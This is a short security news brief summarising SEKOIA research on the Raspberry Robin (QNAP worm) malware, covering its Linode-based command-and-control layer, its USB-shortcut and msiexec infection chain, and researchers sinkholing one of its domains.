Threat Management, Malware

Repurposable nature of Raspberry Robin detailed

Numerous threat actors could repurpose Raspberry Robin, also known as QNAP worm, for their own attacks, reports The Hacker News. Raspberry Robin, which has been attributed to DEV-0856, was discovered by SEKOIA researchers to have at least eight Linode-based virtual private servers acting as a second command-and-control layer on top of compromised QNAP network-attached storage devices. Such attack infrastructure facilitates an attack chain that commences with the launch of a Windows shortcut file from an inserted USB drive that would enable the msiexec utility and later download the primary obfuscated Raspberry Robin payload. Researchers noted that malware retrieval through HTTP requests sent by msiexec allows request hijacking for other rogue MSI payload downloads. "By pointing this domain to our sinkhole, we were able to obtain telemetry from one of the first domains used by Raspberry Robin operators," said SEKOIA, which added that the Raspberry Robin domain could still be reused for other malicious activities.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.